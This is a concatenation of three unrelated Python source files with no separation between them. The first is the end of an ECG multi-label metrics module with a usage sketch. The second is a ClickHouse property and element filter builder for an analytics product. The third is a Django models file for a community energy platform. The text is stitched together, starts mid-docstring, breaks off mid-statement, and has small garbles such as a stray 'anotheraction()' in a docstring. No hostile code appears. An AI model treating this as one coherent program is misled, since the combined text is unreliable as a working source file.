the format of abbrevations truth: sequence, ground truth array, of shape (n_records, n_classes), with values 0 or 1 binary_pred: sequence, binary predictions, of shape (n_records, n_classes), with values 0 or 1 scalar_pred: sequence, probability predictions, of shape (n_records, n_classes), with values within [0,1] Returns ------- auroc: float, auprc: float, accuracy: float, f_measure: float, f_beta_measure: float, g_beta_measure: float, challenge_metric: float, """ # normal_class = "426783006" normal_class = "NSR" # equivalent_classes = [["713427006", "59118001"], ["284470004", "63593006"], ["427172004", "17338001"]] weights = load_weights(classes=classes) _truth = np.array(truth) _binary_pred = np.array(binary_pred) _scalar_pred = np.array(scalar_pred) print("- AUROC and AUPRC...") auroc, auprc = compute_auc(_truth, _scalar_pred) print("- Accuracy...") accuracy = compute_accuracy(_truth, _binary_pred) print("- F-measure...") f_measure = compute_f_measure(_truth, _binary_pred) print("- F-beta and G-beta measures...") f_beta_measure, g_beta_measure = compute_beta_measures(_truth, _binary_pred, beta=2) print("- Challenge metric...") challenge_metric = compute_challenge_metric(weights, _truth, _binary_pred, classes, normal_class) print("Done.") # Return the results. return auroc, auprc, accuracy, f_measure, f_beta_measure, g_beta_measure, challenge_metric # Compute recording-wise accuracy. def compute_accuracy(labels:np.ndarray, outputs:np.ndarray) -> float: """ checked, """ num_recordings, num_classes = np.shape(labels) num_correct_recordings = 0 for i in range(num_recordings): if np.all(labels[i, :]==outputs[i, :]): num_correct_recordings += 1 return float(num_correct_recordings) / float(num_recordings) # Compute confusion matrices. def compute_confusion_matrices(labels:np.ndarray, outputs:np.ndarray, normalize:bool=False) -> np.ndarray: """ checked, """ # Compute a binary confusion matrix for each class k: # # [TN_k FN_k] # [FP_k TP_k] # # If the normalize variable is set to true, then normalize the contributions # to the confusion matrix by the number of labels per recording. num_recordings, num_classes = np.shape(labels) if not normalize: A = np.zeros((num_classes, 2, 2)) for i in range(num_recordings): for j in range(num_classes): if labels[i, j]==1 and outputs[i, j]==1: # TP A[j, 1, 1] += 1 elif labels[i, j]==0 and outputs[i, j]==1: # FP A[j, 1, 0] += 1 elif labels[i, j]==1 and outputs[i, j]==0: # FN A[j, 0, 1] += 1 elif labels[i, j]==0 and outputs[i, j]==0: # TN A[j, 0, 0] += 1 else: # This condition should not happen. raise ValueError("Error in computing the confusion matrix.") else: A = np.zeros((num_classes, 2, 2)) for i in range(num_recordings): normalization = float(max(np.sum(labels[i, :]), 1)) for j in range(num_classes): if labels[i, j]==1 and outputs[i, j]==1: # TP A[j, 1, 1] += 1.0/normalization elif labels[i, j]==0 and outputs[i, j]==1: # FP A[j, 1, 0] += 1.0/normalization elif labels[i, j]==1 and outputs[i, j]==0: # FN A[j, 0, 1] += 1.0/normalization elif labels[i, j]==0 and outputs[i, j]==0: # TN A[j, 0, 0] += 1.0/normalization else: # This condition should not happen. raise ValueError("Error in computing the confusion matrix.") return A # Compute macro F-measure. 
def compute_f_measure(labels:np.ndarray, outputs:np.ndarray) -> float: """ checked, """ num_recordings, num_classes = np.shape(labels) A = compute_confusion_matrices(labels, outputs) f_measure = np.zeros(num_classes) for k in range(num_classes): tp, fp, fn, tn = A[k, 1, 1], A[k, 1, 0], A[k, 0, 1], A[k, 0, 0] if 2 * tp + fp + fn: f_measure[k] = float(2 * tp) / float(2 * tp + fp + fn) else: f_measure[k] = float("nan") macro_f_measure = np.nanmean(f_measure) return macro_f_measure # Compute F-beta and G-beta measures from the unofficial phase of the Challenge. def compute_beta_measures(labels:np.ndarray, outputs:np.ndarray, beta:Real) -> Tuple[float, float]: """ checked, """ num_recordings, num_classes = np.shape(labels) A = compute_confusion_matrices(labels, outputs, normalize=True) f_beta_measure = np.zeros(num_classes) g_beta_measure = np.zeros(num_classes) for k in range(num_classes): tp, fp, fn, tn = A[k, 1, 1], A[k, 1, 0], A[k, 0, 1], A[k, 0, 0] if (1+beta**2)*tp + fp + beta**2*fn: f_beta_measure[k] = float((1+beta**2)*tp) / float((1+beta**2)*tp + fp + beta**2*fn) else: f_beta_measure[k] = float("nan") if tp + fp + beta*fn: g_beta_measure[k] = float(tp) / float(tp + fp + beta*fn) else: g_beta_measure[k] = float("nan") macro_f_beta_measure = np.nanmean(f_beta_measure) macro_g_beta_measure = np.nanmean(g_beta_measure) return macro_f_beta_measure, macro_g_beta_measure # Compute macro AUROC and macro AUPRC. def compute_auc(labels:np.ndarray, outputs:np.ndarray) -> Tuple[float, float]: """ checked, """ num_recordings, num_classes = np.shape(labels) # Compute and summarize the confusion matrices for each class across at distinct output values. auroc = np.zeros(num_classes) auprc = np.zeros(num_classes) for k in range(num_classes): # We only need to compute TPs, FPs, FNs, and TNs at distinct output values. thresholds = np.unique(outputs[:, k]) thresholds = np.append(thresholds, thresholds[-1]+1) thresholds = thresholds[::-1] num_thresholds = len(thresholds) # Initialize the TPs, FPs, FNs, and TNs. tp = np.zeros(num_thresholds) fp = np.zeros(num_thresholds) fn = np.zeros(num_thresholds) tn = np.zeros(num_thresholds) fn[0] = np.sum(labels[:, k]==1) tn[0] = np.sum(labels[:, k]==0) # Find the indices that result in sorted output values. idx = np.argsort(outputs[:, k])[::-1] # Compute the TPs, FPs, FNs, and TNs for class k across thresholds. i = 0 for j in range(1, num_thresholds): # Initialize TPs, FPs, FNs, and TNs using values at previous threshold. tp[j] = tp[j-1] fp[j] = fp[j-1] fn[j] = fn[j-1] tn[j] = tn[j-1] # Update the TPs, FPs, FNs, and TNs at i-th output value. while i < num_recordings and outputs[idx[i], k] >= thresholds[j]: if labels[idx[i], k]: tp[j] += 1 fn[j] -= 1 else: fp[j] += 1 tn[j] -= 1 i += 1 # Summarize the TPs, FPs, FNs, and TNs for class k. tpr = np.zeros(num_thresholds) tnr = np.zeros(num_thresholds) ppv = np.zeros(num_thresholds) for j in range(num_thresholds): if tp[j] + fn[j]: tpr[j] = float(tp[j]) / float(tp[j] + fn[j]) else: tpr[j] = float("nan") if fp[j] + tn[j]: tnr[j] = float(tn[j]) / float(fp[j] + tn[j]) else: tnr[j] = float("nan") if tp[j] + fp[j]: ppv[j] = float(tp[j]) / float(tp[j] + fp[j]) else: ppv[j] = float("nan") # Compute AUROC as the area under a piecewise linear function with TPR/ # sensitivity (x-axis) and TNR/specificity (y-axis) and AUPRC as the area # under a piecewise constant with TPR/recall (x-axis) and PPV/precision # (y-axis) for class k. 
        for j in range(num_thresholds-1):
            auroc[k] += 0.5 * (tpr[j+1] - tpr[j]) * (tnr[j+1] + tnr[j])
            auprc[k] += (tpr[j+1] - tpr[j]) * ppv[j+1]

    # Compute macro AUROC and macro AUPRC across classes.
    macro_auroc = np.nanmean(auroc)
    macro_auprc = np.nanmean(auprc)

    return macro_auroc, macro_auprc


# Compute modified confusion matrix for multi-class, multi-label tasks.
def compute_modified_confusion_matrix(labels:np.ndarray, outputs:np.ndarray) -> np.ndarray:
    """ checked,

    Compute a binary multi-class, multi-label confusion matrix, where the rows
    are the labels and the columns are the outputs.
    """
    num_recordings, num_classes = np.shape(labels)
    A = np.zeros((num_classes, num_classes))

    # Iterate over all of the recordings.
    for i in range(num_recordings):
        # Calculate the number of positive labels and/or outputs.
        normalization = float(max(np.sum(np.any((labels[i, :], outputs[i, :]), axis=0)), 1))
        # Iterate over all of the classes.
        for j in range(num_classes):
            # Assign full and/or partial credit for each positive class.
            if labels[i, j]:
                for k in range(num_classes):
                    if outputs[i, k]:
                        A[j, k] += 1.0/normalization

    return A


# Compute the evaluation metric for the Challenge.
def compute_challenge_metric(weights:np.ndarray, labels:np.ndarray, outputs:np.ndarray, classes:List[str], normal_class:str) -> float:
    """ checked,
    """
    num_recordings, num_classes = np.shape(labels)
    normal_index = classes.index(normal_class)

    # Compute the observed score.
    A = compute_modified_confusion_matrix(labels, outputs)
    observed_score = np.nansum(weights * A)

    # Compute the score for the model that always chooses the correct label(s).
    correct_outputs = labels
    A = compute_modified_confusion_matrix(labels, correct_outputs)
    correct_score = np.nansum(weights * A)

    # Compute the score for the model that always chooses the normal class.
    # NOTE: `np.bool` is deprecated (removed in NumPy >= 1.24); use the builtin `bool` instead.
    inactive_outputs = np.zeros((num_recordings, num_classes), dtype=bool)
    inactive_outputs[:, normal_index] = 1
    A = compute_modified_confusion_matrix(labels, inactive_outputs)
    inactive_score = np.nansum(weights * A)

    if correct_score != inactive_score:
        normalized_score = float(observed_score - inactive_score) / float(correct_score - inactive_score)
    else:
        normalized_score = 0.0

    return normalized_score


# alias
compute_metrics = compute_challenge_metric
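# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original evaluation code): a tiny
# hand-made batch of 3 recordings and 2 classes run through the metric helpers
# defined above. The class list and the identity weight matrix below are
# hypothetical, chosen only so the example is self-contained and runnable.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    import numpy as np  # already imported at module level; repeated here for clarity

    toy_truth = np.array([[1, 0], [0, 1], [1, 1]])  # ground truth, shape (n_records, n_classes)
    toy_pred = np.array([[1, 0], [1, 1], [1, 0]])   # binary predictions

    # recording-wise accuracy: only the first recording matches exactly -> 1/3
    acc = compute_accuracy(toy_truth, toy_pred)
    # macro F1 and the F-beta / G-beta measures over the two classes
    f1 = compute_f_measure(toy_truth, toy_pred)
    f_beta, g_beta = compute_beta_measures(toy_truth, toy_pred, beta=2)

    # challenge metric: "NSR" plays the role of the normal class here, and an
    # identity weight matrix stands in for the official reward matrix
    toy_classes = ["AF", "NSR"]
    toy_weights = np.eye(len(toy_classes))
    cm = compute_challenge_metric(toy_weights, toy_truth, toy_pred, toy_classes, "NSR")

    print(acc, f1, f_beta, g_beta, cm)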
import re from typing import Any, Dict, List, Optional, Set, Tuple, cast from django.utils import timezone from rest_framework import exceptions from ee.clickhouse.client import sync_execute from ee.clickhouse.materialized_columns.columns import TableWithProperties, get_materialized_columns from ee.clickhouse.models.cohort import format_filter_query from ee.clickhouse.models.util import is_json from ee.clickhouse.sql.events import SELECT_PROP_VALUES_SQL, SELECT_PROP_VALUES_SQL_WITH_FILTER from ee.clickhouse.sql.person import GET_DISTINCT_IDS_BY_PROPERTY_SQL from posthog.models.cohort import Cohort from posthog.models.event import Selector from posthog.models.property import NEGATED_OPERATORS, OperatorType, Property, PropertyName, PropertyType from posthog.models.team import Team from posthog.utils import is_valid_regex, relative_date_parse def parse_prop_clauses( filters: List[Property], team_id: Optional[int], prepend: str = "global", table_name: str = "", allow_denormalized_props: bool = False, filter_test_accounts=False, is_person_query=False, ) -> Tuple[str, Dict]: final = [] params: Dict[str, Any] = {} if team_id is not None: params["team_id"] = team_id if table_name != "": table_name += "." if filter_test_accounts: test_account_filters = Team.objects.only("test_account_filters").get(id=team_id).test_account_filters filters.extend([Property(**prop) for prop in test_account_filters]) for idx, prop in enumerate(filters): if prop.type == "cohort": try: cohort = Cohort.objects.get(pk=prop.value, team_id=team_id) except Cohort.DoesNotExist: final.append("AND 0 = 13") # If cohort doesn't exist, nothing can match else: person_id_query, cohort_filter_params = format_filter_query(cohort, idx) params = {**params, **cohort_filter_params} final.append( "AND {table_name}distinct_id IN ({clause})".format(table_name=table_name, clause=person_id_query) ) elif prop.type == "person": filter_query, filter_params = prop_filter_json_extract( prop, idx, "{}person".format(prepend), allow_denormalized_props=allow_denormalized_props ) if is_person_query: final.append(filter_query) params.update(filter_params) else: final.append( "AND {table_name}distinct_id IN ({filter_query})".format( filter_query=GET_DISTINCT_IDS_BY_PROPERTY_SQL.format(filters=filter_query), table_name=table_name, ) ) params.update(filter_params) elif prop.type == "element": query, filter_params = filter_element( {prop.key: prop.value}, operator=prop.operator, prepend="{}_".format(idx) ) if query: final.append(f" AND {query}") params.update(filter_params) else: filter_query, filter_params = prop_filter_json_extract( prop, idx, prepend, prop_var="{}properties".format(table_name), allow_denormalized_props=allow_denormalized_props, ) final.append(f"{filter_query} AND {table_name}team_id = %(team_id)s" if team_id else filter_query) params.update(filter_params) return " ".join(final), params def prop_filter_json_extract( prop: Property, idx: int, prepend: str = "", prop_var: str = "properties", allow_denormalized_props: bool = False ) -> Tuple[str, Dict[str, Any]]: # TODO: Once all queries are migrated over we can get rid of allow_denormalized_props property_expr, is_denormalized = get_property_string_expr( property_table(prop), prop.key, f"%(k{prepend}_{idx})s", prop_var, allow_denormalized_props ) operator = prop.operator params: Dict[str, Any] = {} if operator == "is_not": params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): box_value(prop.value)} return ( "AND NOT has(%(v{prepend}_{idx})s, 
{left})".format(idx=idx, prepend=prepend, left=property_expr), params, ) elif operator == "icontains": value = "%{}%".format(prop.value) params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): value} return ( "AND {left} ILIKE %(v{prepend}_{idx})s".format(idx=idx, prepend=prepend, left=property_expr), params, ) elif operator == "not_icontains": value = "%{}%".format(prop.value) params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): value} return ( "AND NOT ({left} ILIKE %(v{prepend}_{idx})s)".format(idx=idx, prepend=prepend, left=property_expr), params, ) elif operator in ("regex", "not_regex"): if not is_valid_regex(prop.value): return "AND 1 = 2", {} params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): prop.value} return ( "AND {regex_function}({left}, %(v{prepend}_{idx})s)".format( regex_function="match" if operator == "regex" else "NOT match", idx=idx, prepend=prepend, left=property_expr, ), params, ) elif operator == "is_set": params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): prop.value} if is_denormalized: return ( "AND NOT isNull({left})".format(left=property_expr), params, ) return ( "AND JSONHas({prop_var}, %(k{prepend}_{idx})s)".format(idx=idx, prepend=prepend, prop_var=prop_var), params, ) elif operator == "is_not_set": params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): prop.value} if is_denormalized: return ( "AND isNull({left})".format(left=property_expr), params, ) return ( "AND (isNull({left}) OR NOT JSONHas({prop_var}, %(k{prepend}_{idx})s))".format( idx=idx, prepend=prepend, prop_var=prop_var, left=property_expr ), params, ) elif operator == "gt": params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): prop.value} return ( "AND toFloat64OrNull(trim(BOTH '\"' FROM replaceRegexpAll({left}, ' ', ''))) > %(v{prepend}_{idx})s".format( idx=idx, prepend=prepend, left=property_expr, ), params, ) elif operator == "lt": params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): prop.value} return ( "AND toFloat64OrNull(trim(BOTH '\"' FROM replaceRegexpAll({left}, ' ', ''))) < %(v{prepend}_{idx})s".format( idx=idx, prepend=prepend, left=property_expr, ), params, ) else: if is_json(prop.value) and not is_denormalized: clause = "AND has(%(v{prepend}_{idx})s, replaceRegexpAll(visitParamExtractRaw({prop_var}, %(k{prepend}_{idx})s),' ', ''))" params = { "k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): box_value(prop.value, remove_spaces=True), } else: clause = "AND has(%(v{prepend}_{idx})s, {left})" params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): box_value(prop.value)} return ( clause.format(left=property_expr, idx=idx, prepend=prepend, prop_var=prop_var), params, ) def property_table(property: Property) -> TableWithProperties: if property.type == "event": return "events" elif property.type == "person": return "person" else: raise ValueError(f"Property type does not have a table: {property.type}") def get_property_string_expr( table: TableWithProperties, property_name: PropertyName, var: str, prop_var: str, allow_denormalized_props: bool = True, ) -> Tuple[str, bool]: materialized_columns = get_materialized_columns(table) if allow_denormalized_props else {} # :TODO: Handle denormalized properties in person table if allow_denormalized_props and property_name in materialized_columns and table == "events": return 
materialized_columns[property_name], True return f"trim(BOTH '\"' FROM JSONExtractRaw({prop_var}, {var}))", False def box_value(value: Any, remove_spaces=False) -> List[Any]: if not isinstance(value, List): value = [value] return [str(value).replace(" ", "") if remove_spaces else str(value) for value in value] def get_property_values_for_key(key: str, team: Team, value: Optional[str] = None): parsed_date_from = "AND timestamp >= '{}'".format(relative_date_parse("-7d").strftime("%Y-%m-%d 00:00:00")) parsed_date_to = "AND timestamp <= '{}'".format(timezone.now().strftime("%Y-%m-%d 23:59:59")) if value: return sync_execute( SELECT_PROP_VALUES_SQL_WITH_FILTER.format(parsed_date_from=parsed_date_from, parsed_date_to=parsed_date_to), {"team_id": team.pk, "key": key, "value": "%{}%".format(value)}, ) return sync_execute( SELECT_PROP_VALUES_SQL.format(parsed_date_from=parsed_date_from, parsed_date_to=parsed_date_to), {"team_id": team.pk, "key": key}, ) def filter_element(filters: Dict, *, operator: Optional[OperatorType] = None, prepend: str = "") -> Tuple[str, Dict]: if not operator: operator = "exact" params = {} final_conditions = [] if filters.get("selector") is not None: if operator not in ("exact", "is_not"): raise exceptions.ValidationError( 'Filtering by element selector only supports operators "equals" and "doesn\'t equal" currently.' ) selectors = filters["selector"] if isinstance(filters["selector"], list) else [filters["selector"]] if selectors: combination_conditions = [] for idx, query in enumerate(selectors): selector = Selector(query, escape_slashes=False) key = f"{prepend}_{idx}_selector_regex" params[key] = build_selector_regex(selector) combination_conditions.append(f"match(elements_chain, %({key})s)") final_conditions.append(f"({' OR '.join(combination_conditions)})") elif operator not in NEGATED_OPERATORS: # If a non-negated filter has an empty selector list provided, it can't match anything return "0 = 191", {} if filters.get("tag_name") is not None: if operator not in ("exact", "is_not"): raise exceptions.ValidationError( 'Filtering by element tag only supports operators "equals" and "doesn\'t equal" currently.' 
) tag_names = filters["tag_name"] if isinstance(filters["tag_name"], list) else [filters["tag_name"]] if tag_names: combination_conditions = [] for idx, tag_name in enumerate(tag_names): key = f"{prepend}_{idx}_tag_name_regex" params[key] = rf"(^|;){tag_name}(\.|$|;|:)" combination_conditions.append(f"match(elements_chain, %({key})s)") final_conditions.append(f"({' OR '.join(combination_conditions)})") elif operator not in NEGATED_OPERATORS: # If a non-negated filter has an empty tag_name list provided, it can't match anything return "0 = 192", {} attributes: Dict[str, List] = {} for key in ["href", "text"]: if filters.get(key) is not None: attributes[key] = process_ok_values(filters[key], operator) if attributes: for key, ok_values in attributes.items(): if ok_values: combination_conditions = [] for idx, value in enumerate(ok_values): optional_flag = "(?i)" if operator.endswith("icontains") else "" params[f"{prepend}_{key}_{idx}_attributes_regex"] = f'{optional_flag}({key}="{value}")' combination_conditions.append(f"match(elements_chain, %({prepend}_{key}_{idx}_attributes_regex)s)") final_conditions.append(f"({' OR '.join(combination_conditions)})") elif operator not in NEGATED_OPERATORS: # If a non-negated filter has an empty href or text list provided, it can't match anything return "0 = 193", {} if final_conditions: return f"{'NOT ' if operator in NEGATED_OPERATORS else ''}({' AND '.join(final_conditions)})", params else: return "", {} def process_ok_values(ok_values: Any, operator: OperatorType) -> List[str]: if operator.endswith("_set"): return [r'[^"]+'] else: # Make sure ok_values is a list ok_values = cast(List[str], [str(val) for val in ok_values]) if isinstance(ok_values, list) else [ok_values] # Escape double quote characters, since e.g. text 'foo="bar"' is represented as text="foo=\"bar\"" # in the elements chain ok_values = [text.replace('"', r"\"") for text in ok_values] if operator.endswith("icontains"): # Process values for case-insensitive-contains matching by way of regex, # making sure matching scope is limited to between double quotes return [rf'[^"]*{re.escape(text)}[^"]*' for text in ok_values] if operator.endswith("regex"): # Use values as-is in case of regex matching return ok_values # For all other operators escape regex-meaningful sequences return [re.escape(text) for text in ok_values] def build_selector_regex(selector: Selector) -> str: regex = r"" for tag in selector.parts: if tag.data.get("tag_name") and isinstance(tag.data["tag_name"], str): if tag.data["tag_name"] == "*": regex += ".+" else: regex += tag.data["tag_name"] if tag.data.get("attr_class__contains"): regex += r".*?\.{}".format(r"\..*?".join(sorted(tag.data["attr_class__contains"]))) if tag.ch_attributes: regex += ".*?" for key, value in sorted(tag.ch_attributes.items()): regex += '{}="{}".*?'.format(key, value) regex += r"([-_a-zA-Z0-9\.]*?)?($|;|:([^;^\s]*(;|$|\s)))" if tag.direct_descendant: regex += ".*" return regex def extract_tables_and_properties(props: List[Property]) -> Set[Tuple[PropertyName, PropertyType]]: return set((prop.key, prop.type) for prop in props)
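# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the module above): the regexes built by
# filter_element() are evaluated by ClickHouse's match() against the
# serialized `elements_chain` column. The chain string below is a hand-written
# example, but the two patterns mirror what the code above produces for a
# `tag_name` filter and an exact `text` filter.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    import re

    # hypothetical serialized chain: elements separated by ";", attributes as key="value"
    elements_chain = 'button.primary:text="Sign up"nth-child="2";div.header:nth-child="1"'

    # same shape as the tag_name regex built in filter_element()
    tag_name_regex = r"(^|;)button(\.|$|;|:)"
    assert re.search(tag_name_regex, elements_chain)

    # same shape as the attribute regex built for an exact "text" filter,
    # after process_ok_values() has passed the value through re.escape()
    text_regex = '({}="{}")'.format("text", re.escape("Sign up"))
    assert re.search(text_regex, elements_chain)

    print("both element filters match the example chain")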
import datetime import json from django.db import models from django.db.models.fields import BooleanField, related from django.db.models.query_utils import select_related_descend from database.utils.constants import * from .utils.common import json_loader, get_json_if_not_none, get_summary_info from django.forms.models import model_to_dict from carbon_calculator.models import Action as CCAction import uuid CHOICES = json_loader("./database/raw_data/other/databaseFieldChoices.json") ZIP_CODE_AND_STATES = json_loader("./database/raw_data/other/states.json") class Location(models.Model): """ A class used to represent a geographical region. It could be a complete and proper address or just a city name, zipcode, county etc Attributes ---------- type : str the type of the location, whether it is a full address, zipcode only, etc street : str The street number if it is available city : str the name of the city if available county : str the name of the county if available state: str the name of the state if available more_info: JSON any anotheraction() dynamic information we would like to store about this location """ id = models.AutoField(primary_key=True) location_type = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("LOCATION_TYPES", {}).items() ) street = models.CharField(max_length=SHORT_STR_LEN, blank=True) unit_number = models.CharField(max_length=SHORT_STR_LEN, blank=True) zipcode = models.CharField(max_length=SHORT_STR_LEN, blank=True) city = models.CharField(max_length=SHORT_STR_LEN, blank=True) county = models.CharField(max_length=SHORT_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) state = models.CharField( max_length=SHORT_STR_LEN, choices=ZIP_CODE_AND_STATES.items(), blank=True ) country = models.CharField(max_length=SHORT_STR_LEN, default="US", blank=True) more_info = models.JSONField(blank=True, null=True) def __str__(self): # show full loc regardless of tye type its labelled as loc = "" d = lambda: ", " if loc != "" else "" if self.street: loc += self.street if self.unit_number: loc += d() + "#" + self.unit_number if self.city: loc += d() + self.city if self.zipcode: loc += d() + self.zipcode if self.county: loc += d() + self.county if self.state: loc += d() + self.state if self.country and self.country != "US": loc += d() + self.country loc += "-" + self.location_type return loc def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: db_table = "locations" class Media(models.Model): """ A class used to represent any Media that is uploaded to this website Attributes ---------- name : SlugField The short name for this media. It cannot only contain letters, numbers, hypens and underscores. No spaces allowed. file : File the file that is to be stored. media_type: str the type of this media file whether it is an image, video, pdf etc. 
""" id = models.AutoField(primary_key=True) name = models.SlugField(max_length=SHORT_STR_LEN, blank=True) file = models.FileField(upload_to="media/") media_type = models.CharField(max_length=SHORT_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) order = models.PositiveIntegerField(default=0, blank=True, null=True) def __str__(self): return str(self.id) + "-" + self.name + "(" + self.file.name + ")" def simple_json(self): return { "id": self.id, "url": self.file.url, } def full_json(self): return { "id": self.id, "name": self.name, "url": self.file.url, "media_type": self.media_type, } class Meta: db_table = "media" ordering = ("order", "name") class Policy(models.Model): """ A class used to represent a Legal Policy. For instance the Terms and Agreement Statement that users have to agree to during sign up. Attributes ---------- name : str name of the Legal Policy description: str the details of this policy communities_applied: how many communities this policy applies to. is_global: boolean True if this policy should apply to all the communities info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=LONG_STR_LEN, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) is_global = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) more_info = models.JSONField(blank=True, null=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): # would this blow up because no community_set? res = model_to_dict(self) community = self.community_set.all().first() if community: res["community"] = get_json_if_not_none(community) return res class Meta: ordering = ("name",) db_table = "legal_policies" verbose_name_plural = "Legal Policies" class Goal(models.Model): """ A class used to represent a Goal Attributes ---------- name : str A short title for this goal status: str the status of this goal whether it has been achieved or not. 
description: More details about this goal target_date: Date at which goal should be achieved created_at: DateTime The date and time that this goal was added created_at: DateTime The date and time of the last time any updates were made to the information about this goal """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) description = models.TextField(max_length=LONG_STR_LEN, blank=True) target_number_of_households = models.PositiveIntegerField(default=0, blank=True) target_number_of_actions = models.PositiveIntegerField(default=0, blank=True) target_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) initial_number_of_households = models.PositiveIntegerField(default=0, blank=True) initial_number_of_actions = models.PositiveIntegerField(default=0, blank=True) initial_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) attained_number_of_households = models.PositiveIntegerField(default=0, blank=True) attained_number_of_actions = models.PositiveIntegerField(default=0, blank=True) attained_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) organic_attained_number_of_households = models.PositiveIntegerField( default=0, blank=True ) organic_attained_number_of_actions = models.PositiveIntegerField( default=0, blank=True ) organic_attained_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) target_date = models.DateField(null=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return f"{self.name} {" - Deleted" if self.is_deleted else ""}" def simple_json(self): return model_to_dict(self, exclude=["is_deleted"]) def full_json(self): return self.simple_json() class Meta: db_table = "goals" class Community(models.Model): """ A class used to represent a Community on this platform. Attributes ---------- name : str The short name for this Community subdomain : str (can only contain alphabets, numbers, hyphen and underscores) a primary unique identifier for this Community. They would need the same to access their website. For instance if the subdomain is wayland they would access their portal through wayland.massenergize.org owner: JSON information about the name, email and phone of the person who is supposed to be owner and main administrator when this Community account is opened. logo : int Foreign Key to Media that holds logo of community banner : int Foreign Key to Media that holds logo of community is_geographically_focused: boolean Information about whether this community is geographically focused or dispersed is_approved: boolean This field is set to True if the all due diligence has been done by the Super Admins and the community is not allowed to operate. 
    created_at: DateTime
      The date and time that this community was created
    policies: ManyToMany
      policies created by community admins for this community
    updated_at: DateTime
      The date and time of the last time any updates were made to the
      information about this community
    more_info: JSON
      any other dynamic information we would like to store about this community
    """

    id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=SHORT_STR_LEN)
    subdomain = models.SlugField(max_length=SHORT_STR_LEN, unique=True, db_index=True)
    owner_name = models.CharField(max_length=SHORT_STR_LEN, default="Unknown")
    owner_email = models.EmailField(blank=False)
    owner_phone_number = models.CharField(
        blank=True, null=True, max_length=SHORT_STR_LEN
    )
    about_community = models.TextField(max_length=LONG_STR_LEN, blank=True)
    logo = models.ForeignKey(
        Media,
        on_delete=models.SET_NULL,
        null=True,
        blank=True,
        related_name="community_logo",
    )
    banner = models.ForeignKey(
        Media,
        on_delete=models.SET_NULL,
        null=True,
        blank=True,
        related_name="community_banner",
    )
    favicon = models.ForeignKey(
        Media,
        on_delete=models.SET_NULL,
        null=True,
        blank=True,
        related_name="community_favicon",
    )
    goal = models.ForeignKey(Goal, blank=True, null=True, on_delete=models.SET_NULL)
    is_geographically_focused = models.BooleanField(default=False, blank=True)

    # deprecated: location of community was originally a JSON string; now defined
    # below in locations (link to Location model)
    location = models.JSONField(blank=True, null=True)

    # new - define the geographic area for a community (zipcodes, towns/cities,
    # counties, states, countries)
    geography_type = models.CharField(
        max_length=TINY_STR_LEN,
        choices=CHOICES.get("COMMUNITY_GEOGRAPHY_TYPES", {}).items(),
        blank=True,
        null=True,
    )

    # locations defines the range for geographic communities
    locations = models.ManyToManyField(Location, blank=True)
    policies = models.ManyToManyField(Policy, blank=True)
    is_approved = models.BooleanField(default=False, blank=True)
    accepted_terms_and_conditions = models.BooleanField(default=True)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    more_info = models.JSONField(blank=True, null=True)
    is_deleted = models.BooleanField(default=False, blank=True)
    is_published = models.BooleanField(default=False, blank=True)

    def __str__(self):
        return str(self.id) + " - " + self.name

    def info(self):
        return model_to_dict(self, ["id", "name", "subdomain"])

    def simple_json(self):
        res = model_to_dict(
            self,
            [
                "id",
                "name",
                "subdomain",
                "is_approved",
                "owner_phone_number",
                "owner_name",
                "owner_email",
                "is_geographically_focused",
                "is_published",
                "more_info",
                "location",
            ],
        )
        res["logo"] = get_json_if_not_none(self.logo)
        res["favicon"] = get_json_if_not_none(self.favicon)
        return res

    def full_json(self):
        admin_group: CommunityAdminGroup = CommunityAdminGroup.objects.filter(
            community__id=self.pk
        ).first()
        if admin_group:
            admins = [a.simple_json() for a in admin_group.members.all()]
        else:
            admins = []

        customDomain: CustomCommunityWebsiteDomain = (
            CustomCommunityWebsiteDomain.objects.filter(community__id=self.pk)
        )
        website = None
        if customDomain:
            website = customDomain.first().website

        # get the community goal
        goal = get_json_if_not_none(self.goal) or {}

        # goal defined consistently; not differently in two places
        if self.is_geographically_focused:
            goal[
                "organic_attained_number_of_households"
            ] = RealEstateUnit.objects.filter(is_deleted=False, community=self).count()
            done_actions = UserActionRel.objects.filter(
